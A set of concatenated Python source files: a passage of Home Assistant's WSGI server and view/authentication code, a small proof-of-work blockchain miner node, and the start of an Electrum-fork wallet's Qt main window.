parsed = dt_util.parse_date(value)
if parsed is None:
raise ValidationError()
return parsed
def to_url(self, value):
"""Convert date to url value."""
return value.isoformat()
class DateTimeValidator(BaseConverter):
"""Validate datetimes in urls formatted per ISO 8601."""
regex = r'\d{4}-[01]\d-[0-3]\dT[0-2]\d:[0-5]\d:[0-5]\d' \
r'\.\d+([+-][0-2]\d:[0-5]\d|Z)'
def to_python(self, value):
"""Validate and convert date."""
parsed = dt_util.parse_datetime(value)
if parsed is None:
raise ValidationError()
return parsed
def to_url(self, value):
"""Convert date to url value."""
return value.isoformat()
return Map(converters={
'entity': EntityValidator,
'date': DateValidator,
'datetime': DateTimeValidator,
})
class HomeAssistantWSGI(object):
"""WSGI server for Home Assistant."""
# pylint: disable=too-many-instance-attributes, too-many-locals
# pylint: disable=too-many-arguments
def __init__(self, hass, development, api_password, ssl_certificate,
ssl_key, server_host, server_port, cors_origins,
approved_ips):
"""Initilalize the WSGI Home Assistant server."""
from werkzeug.wrappers import Response
Response.mimetype = 'text/html'
# pylint: disable=invalid-name
self.Request = request_class()
self.url_map = routing_map(hass)
self.views = {}
self.hass = hass
self.extra_apps = {}
self.development = development
self.api_password = api_password
self.ssl_certificate = ssl_certificate
self.ssl_key = ssl_key
self.server_host = server_host
self.server_port = server_port
self.cors_origins = cors_origins
self.approved_ips = approved_ips
self.event_forwarder = None
self.server = None
def register_view(self, view):
"""Register a view with the WSGI server.
The view argument must be a class that inherits from HomeAssistantView.
It is optional to instantiate it before registering; this method will
handle it either way.
"""
from werkzeug.routing import Rule
if view.name in self.views:
_LOGGER.warning("View '%s' is being overwritten", view.name)
if isinstance(view, type):
# Instantiate the view, if needed
view = view(self.hass)
self.views[view.name] = view
rule = Rule(view.url, endpoint=view.name)
self.url_map.add(rule)
for url in view.extra_urls:
rule = Rule(url, endpoint=view.name)
self.url_map.add(rule)
def register_redirect(self, url, redirect_to):
"""Register a redirect with the server.
If given this must be either a string or callable. In case of a
callable it's called with the url adapter that triggered the match and
the values of the URL as keyword arguments and has to return the target
for the redirect, otherwise it has to be a string with placeholders in
rule syntax.
"""
from werkzeug.routing import Rule
self.url_map.add(Rule(url, redirect_to=redirect_to))
def register_static_path(self, url_root, path, cache_length=31):
"""Register a folder to serve as a static path.
Specify optional cache length of asset in days.
"""
from static import Cling
headers = []
if cache_length and not self.development:
# Convert the cache length from days to seconds.
cache_time = cache_length * 86400
headers.append({
'prefix': '',
HTTP_HEADER_CACHE_CONTROL:
"public, max-age={}".format(cache_time)
})
self.register_wsgi_app(url_root, Cling(path, headers=headers))
def register_wsgi_app(self, url_root, app):
"""Register a path to serve a WSGI app."""
if url_root in self.extra_apps:
_LOGGER.warning("Url root '%s' is being overwritten", url_root)
self.extra_apps[url_root] = app
def start(self):
"""Start the wsgi server."""
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
# pylint: disable=too-few-public-methods,super-init-not-called
class ContextSSLAdapter(BuiltinSSLAdapter):
"""SSL Adapter that takes in an SSL context."""
def __init__(self, context):
self.context = context
# pylint: disable=no-member
self.server = wsgiserver.CherryPyWSGIServer(
(self.server_host, self.server_port), self,
server_name='Home Assistant')
if self.ssl_certificate:
context = ssl.SSLContext(SSL_VERSION)
context.options |= SSL_OPTS
context.set_ciphers(CIPHERS)
context.load_cert_chain(self.ssl_certificate, self.ssl_key)
self.server.ssl_adapter = ContextSSLAdapter(context)
threading.Thread(
target=self.server.start, daemon=True, name='WSGI-server').start()
def stop(self):
"""Stop the wsgi server."""
self.server.stop()
def dispatch_request(self, request):
"""Handle incoming request."""
from werkzeug.exceptions import (
MethodNotAllowed, NotFound, BadRequest, Unauthorized,
)
from werkzeug.routing import RequestRedirect
with request:
adapter = self.url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return self.views[endpoint].handle_request(request, **values)
except RequestRedirect as ex:
return ex
except (BadRequest, NotFound, MethodNotAllowed,
Unauthorized) as ex:
resp = ex.get_response(request.environ)
if request.accept_mimetypes.accept_json:
resp.data = json.dumps({
'result': 'error',
'message': str(ex),
})
resp.mimetype = CONTENT_TYPE_JSON
return resp
def base_app(self, environ, start_response):
"""WSGI Handler of requests to base app."""
request = self.Request(environ)
response = self.dispatch_request(request)
if self.cors_origins:
cors_check = (environ.get('HTTP_ORIGIN') in self.cors_origins)
cors_headers = ", ".join(ALLOWED_CORS_HEADERS)
if cors_check:
response.headers[HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN] = \
environ.get('HTTP_ORIGIN')
response.headers[HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS] = \
cors_headers
return response(environ, start_response)
def __call__(self, environ, start_response):
"""Handle a request for base app + extra apps."""
from werkzeug.wsgi import DispatcherMiddleware
if not self.hass.is_running:
from werkzeug.exceptions import BadRequest
return BadRequest()(environ, start_response)
app = DispatcherMiddleware(self.base_app, self.extra_apps)
# Strip out any cachebusting MD5 fingerprints
fingerprinted = _FINGERPRINT.match(environ.get('PATH_INFO', ''))
if fingerprinted:
environ['PATH_INFO'] = '{}.{}'.format(*fingerprinted.groups())
return app(environ, start_response)
class HomeAssistantView(object):
"""Base view for all views."""
extra_urls = []
requires_auth = True # Views inheriting from this class can override this
def __init__(self, hass):
"""Initilalize the base view."""
from werkzeug.wrappers import Response
if not hasattr(self, 'url'):
class_name = self.__class__.__name__
raise AttributeError(
'{0} missing required attribute "url"'.format(class_name)
)
if not hasattr(self, 'name'):
class_name = self.__class__.__name__
raise AttributeError(
'{0} missing required attribute "name"'.format(class_name)
)
self.hass = hass
# pylint: disable=invalid-name
self.Response = Response
def handle_request(self, request, **values):
"""Handle request to url."""
from werkzeug.exceptions import MethodNotAllowed, Unauthorized
if request.method == "OPTIONS":
# For CORS preflight requests.
return self.options(request)
try:
handler = getattr(self, request.method.lower())
except AttributeError:
raise MethodNotAllowed
# Auth code verbose on purpose
authenticated = False
if self.hass.wsgi.api_password is None:
authenticated = True
elif request.remote_addr in self.hass.wsgi.approved_ips:
authenticated = True
elif hmac.compare_digest(request.headers.get(HTTP_HEADER_HA_AUTH, ''),
self.hass.wsgi.api_password):
# A valid auth header has been set
authenticated = True
elif hmac.compare_digest(request.args.get(DATA_API_PASSWORD, ''),
self.hass.wsgi.api_password):
authenticated = True
if self.requires_auth and not authenticated:
_LOGGER.warning('Login attempt or request with an invalid '
'password from %s', request.remote_addr)
persistent_notification.create(
self.hass,
'Invalid password used from {}'.format(request.remote_addr),
'Login attempt failed', NOTIFICATION_ID_LOGIN)
raise Unauthorized()
request.authenticated = authenticated
_LOGGER.info('Serving %s to %s (auth: %s)',
request.path, request.remote_addr, authenticated)
result = handler(request, **values)
if isinstance(result, self.Response):
# The method handler returned a ready-made Response, how nice of it
return result
status_code = 200
if isinstance(result, tuple):
result, status_code = result
return self.Response(result, status=status_code)
def json(self, result, status_code=200):
"""Return a JSON response."""
msg = json.dumps(
result, sort_keys=True, cls=rem.JSONEncoder).encode('UTF-8')
return self.Response(
msg, mimetype=CONTENT_TYPE_JSON, status=status_code)
def json_message(self, error, status_code=200):
"""Return a JSON message response."""
return self.json({'message': error}, status_code)
def file(self, request, fil, mimetype=None):
"""Return a file."""
from werkzeug.wsgi import wrap_file
from werkzeug.exceptions import NotFound
if isinstance(fil, str):
if mimetype is None:
mimetype = mimetypes.guess_type(fil)[0]
try:
fil = open(fil, mode='br')
except IOError:
raise NotFound()
return self.Response(wrap_file(request.environ, fil),
mimetype=mimetype, direct_passthrough=True)
def options(self, request):
"""Default handler for OPTIONS (necessary for CORS preflight)."""
return self.Response('', status=200)
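# Hedged sketch of how a view plugs into the classes above; the URL, name and
# payload are illustrative, not an actual Home Assistant view. register_view()
# accepts either the class or an already-created instance.
class ExampleStatusView(HomeAssistantView):
    url = '/api/example_status'
    name = 'api:example_status'

    def get(self, request):
        # handle_request() dispatches on the lower-cased HTTP method name and
        # returns Response objects from handlers unchanged.
        return self.json({'status': 'ok'})


def register_example_view(hass):
    hass.wsgi.register_view(ExampleStatusView)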
|
miner.py
|
from __future__ import print_function
import sys
import os
import math
import argparse
import time
import uuid
import hashlib
import copy
import base64
import threading
# import urllib.request
import secrets
import tornado.web
import tornado.websocket
import tornado.ioloop
import tornado.httpclient
import tornado.gen
import tornado.escape
import setting
import tree
# import node
import chain
import database
# import ecdsa
import eth_keys
# def longest_chain(from_hash = '0'*64):
# conn = database.get_conn2()
# c = conn.cursor()
# c.execute("SELECT * FROM chain WHERE prev_hash = ?", (from_hash,))
# roots = c.fetchall()
# chains = []
# prev_hashs = []
# for root in roots:
# # chains.append([root.hash])
# chains.append([root])
# # print(root)
# block_hash = root[1]
# prev_hashs.append(block_hash)
# t0 = time.time()
# n = 0
# while True:
# if prev_hashs:
# prev_hash = prev_hashs.pop(0)
# else:
# break
# c.execute("SELECT * FROM chain WHERE prev_hash = ?", (prev_hash,))
# leaves = c.fetchall()
# n += 1
# if len(leaves) > 0:
# block_height = leaves[0][3]
# if block_height % 1000 == 0:
# print('longest height', block_height)
# for leaf in leaves:
# for the_chain in chains:
# prev_block = the_chain[-1]
# prev_block_hash = prev_block[1]
# # print(prev_block_hash)
# if prev_block_hash == prev_hash:
# forking_chain = copy.copy(the_chain)
# # chain.append(leaf.hash)
# the_chain.append(leaf)
# chains.append(forking_chain)
# break
# leaf_hash = leaf[1]
# if leaf_hash not in prev_hashs and leaf_hash:
# prev_hashs.append(leaf_hash)
# t1 = time.time()
# # print(tree.current_port, "query time", t1-t0, n)
# longest = []
# for i in chains:
# # print(i)
# if not longest:
# longest = i
# if len(longest) < len(i):
# longest = i
# return longest
messages_out = []
def looping():
global messages_out
# print(messages_out)
while messages_out:
message = messages_out.pop(0)
tree.forward(message)
tornado.ioloop.IOLoop.instance().call_later(1, looping)
def miner_looping():
global messages_out
print("messages_out", len(messages_out))
while messages_out:
message = messages_out.pop(0)
if tree.MinerConnector.node_miner:
tree.MinerConnector.node_miner.write_message(tornado.escape.json_encode(message))
tornado.ioloop.IOLoop.instance().call_later(1, miner_looping)
nonce = 0
def mining():
global nonce
global messages_out
# TODO: move to validate
# db = database.get_conn()
# highest_block_hash = db.get(b'chain')
# if highest_block_hash:
# highest_block_json = db.get(b'block%s' % highest_block_hash)
# if highest_block_json:
# highest_block = tornado.escape.json_decode(highest_block_json)
# if chain.highest_block_height < highest_block[chain.HEIGHT]:
# chain.highest_block_hash = highest_block_hash
# chain.highest_block_height = highest_block[chain.HEIGHT]
# chain.nodes_in_chain = copy.copy(chain.frozen_nodes_in_chain)
# for i in chain.recent_longest:
# data = tornado.escape.json_decode(i[8])#.data
# # for j in data.get("nodes", {}):
# # print("recent longest", i.height, j, data["nodes"][j])
# chain.nodes_in_chain.update(data.get("nodes", {}))
# if tree.current_nodeid not in nodes_in_chain and tree.parent_node_id_msg:
# tree.forward(tree.parent_node_id_msg)
# print(tree.current_port, 'parent_node_id_msg', tree.parent_node_id_msg)
if len(chain.recent_longest):
timecost = chain.recent_longest[0][chain.TIMESTAMP] - chain.recent_longest[-1][chain.TIMESTAMP]
if timecost < 1:
timecost = 1
adjust = timecost / (setting.BLOCK_INTERVAL_SECONDS * setting.BLOCK_DIFFICULTY_CYCLE)
if adjust > 4:
adjust = 4
if adjust < 1/4:
adjust = 1/4
difficulty = chain.recent_longest[0][chain.DIFFICULTY]
block_difficulty = 2**difficulty * adjust
else:
block_difficulty = 2**248
now = int(time.time())
last_synctime = now - now % setting.NETWORK_SPREADING_SECONDS - setting.NETWORK_SPREADING_SECONDS
nodes_to_update = {}
for nodeid in tree.nodes_pool:
if tree.nodes_pool[nodeid][1] < last_synctime:
if nodeid not in chain.nodes_in_chain or chain.nodes_in_chain[nodeid][1] < tree.nodes_pool[nodeid][1]:
# print("nodes_to_update", nodeid, nodes_in_chain[nodeid][1], tree.nodes_pool[nodeid][1], last_synctime)
nodes_to_update[nodeid] = tree.nodes_pool[nodeid]
# nodes_in_chain.update(tree.nodes_pool)
# tree.nodes_pool = nodes_in_chain
# print(tree.nodes_pool)
# print(nodes_to_update)
# print(frozen_block_hash, longest)
nodeno = str(tree.nodeid2no(tree.current_nodeid))
pk = tree.node_sk.public_key
if chain.recent_longest:
prev_hash = chain.recent_longest[0][chain.HASH]
height = chain.recent_longest[0][chain.HEIGHT]
identity = chain.recent_longest[0][chain.IDENTITY]
else:
prev_hash, height, identity = '0'*64, 0, ":"
new_difficulty = int(math.log(block_difficulty, 2))
data = {}
data["nodes"] = nodes_to_update
data["proofs"] = list([list(p) for p in chain.last_hash_proofs])
data["subchains"] = chain.last_subchains_block
data_json = tornado.escape.json_encode(data)
# new_identity = "%s@%s:%s" % (tree.current_nodeid, tree.current_host, tree.current_port)
# new_identity = "%s:%s" % (nodeno, pk)
new_identity = pk.to_checksum_address()
new_timestamp = time.time()
if nonce % 1000 == 0:
print(tree.current_port, 'mining', nonce, int(math.log(block_difficulty, 2)), height, len(chain.subchains_block), len(chain.last_subchains_block))
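    # Try a small batch of nonces per call so the worker thread stays responsive.
    # A hash below the target becomes a NEW_CHAIN_BLOCK and is persisted locally;
    # a near miss (below twice the target) is only broadcast as a NEW_CHAIN_PROOF.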
for i in range(100):
block_hash = hashlib.sha256((prev_hash + str(height+1) + str(nonce) + str(new_difficulty) + new_identity + data_json + str(new_timestamp)).encode('utf8')).hexdigest()
if int(block_hash, 16) < block_difficulty:
if chain.recent_longest:
                print(tree.current_port, 'height', height, 'nodeid', tree.current_nodeid, 'nonce_init', tree.nodeid2no(tree.current_nodeid), 'timecost', chain.recent_longest[0][chain.TIMESTAMP] - chain.recent_longest[-1][chain.TIMESTAMP])
            txid = uuid.uuid4().hex
            message = ['NEW_CHAIN_BLOCK', block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, nodeno, txid]
            messages_out.append(message)
            print(tree.current_port, "mining", height+1, nonce, block_hash)
            db = database.get_conn()
            # persist the block with the nonce that actually met the target,
            # then reset the counter for the next round
            db.put(b'block%s' % block_hash.encode('utf8'), tornado.escape.json_encode([block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, nodeno, txid]).encode('utf8'))
            db.put(b'chain', block_hash.encode('utf8'))
            nonce = 0
            break
if int(block_hash, 16) < block_difficulty*2:
# if longest:
# print(tree.current_port, 'height', height, 'nodeid', tree.current_nodeid, 'nonce_init', tree.nodeid2no(tree.current_nodeid), 'timecost', longest[-1][7] - longest[0][7])#.timestamp
txid = uuid.uuid4().hex
message = ['NEW_CHAIN_PROOF', block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, txid]
messages_out.append(message)
nonce += 1
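# Chain synchronisation: fetch chains from the peers queued in
# chain.nodes_to_fetch, adopt the highest one, rebuild the recent_longest
# window used for retargeting, and enable mining (when setting.MINING is on)
# once the fetch queue has been drained.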
def validate():
global nonce
db = database.get_conn()
    highest_block_hash = db.get(b"chain")
    highest_block_height = 0
    if highest_block_hash:
        block_json = db.get(b'block%s' % highest_block_hash)
        if block_json:
            block = tornado.escape.json_decode(block_json)
            highest_block_height = block[chain.HEIGHT]
    else:
        highest_block_hash = b'0'*64
print("validate nodes_to_fetch", chain.nodes_to_fetch)
c = 0
for nodeid in chain.nodes_to_fetch:
c += 1
new_chain_hash, new_chain_height = chain.fetch_chain(nodeid)
print('validate', highest_block_hash, highest_block_height)
print('validate', new_chain_hash, new_chain_height)
if new_chain_height > highest_block_height:
highest_block_hash = new_chain_hash
highest_block_height = new_chain_height
db.put(b"chain", highest_block_hash)
block_hash = highest_block_hash
chain.recent_longest = []
for i in range(setting.BLOCK_DIFFICULTY_CYCLE):
block_json = db.get(b'block%s' % block_hash)
if block_json:
block = tornado.escape.json_decode(block_json)
block_hash = block[chain.PREV_HASH].encode('utf8')
chain.recent_longest.append(block)
else:
break
for i in range(c):
chain.nodes_to_fetch.pop(0)
if not chain.nodes_to_fetch:
if setting.MINING:
chain.worker_thread_mining = True
nonce = 0
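# Background driver: every two seconds either mine (once validate() has flipped
# chain.worker_thread_mining) or keep validating; it idles while paused or
# before the node has been assigned an id.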
def worker_thread():
while True:
time.sleep(2)
if chain.worker_thread_pause:
continue
if chain.worker_thread_mining:
mining()
continue
if tree.current_nodeid is None:
continue
print('chain validation')
validate()
print('validation done')
# mining_task = tornado.ioloop.PeriodicCallback(mining, 1000) # , jitter=0.5
# mining_task.start()
# print(tree.current_port, "miner")
if __name__ == '__main__':
# print("run python node.py pls")
# tree.current_port = "8001"
tornado.ioloop.IOLoop.instance().call_later(1, miner_looping)
parser = argparse.ArgumentParser(description="python3 node.py --name=<miner_name> [--host=<127.0.0.1>] [--port=<8001>]")
parser.add_argument('--name')
parser.add_argument('--host')
parser.add_argument('--port')
args = parser.parse_args()
if not args.name:
        print('--name required')
sys.exit()
tree.current_name = args.name
tree.current_host = args.host
tree.current_port = args.port
sk_filename = "miners/%s.key" % tree.current_name
    if os.path.exists(sk_filename):
        with open(sk_filename, 'rb') as f:
            raw_key = f.read(32)
    else:
        raw_key = secrets.token_bytes(32)
        with open(sk_filename, "wb") as f:
            f.write(raw_key)
    tree.node_sk = eth_keys.keys.PrivateKey(raw_key)
database.main()
setting.MINING = True
tree.MinerConnector(tree.current_host, tree.current_port)
worker_threading = threading.Thread(target=worker_thread)
worker_threading.start()
tornado.ioloop.IOLoop.instance().start()
# worker_threading.join()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Noir Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Noir Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
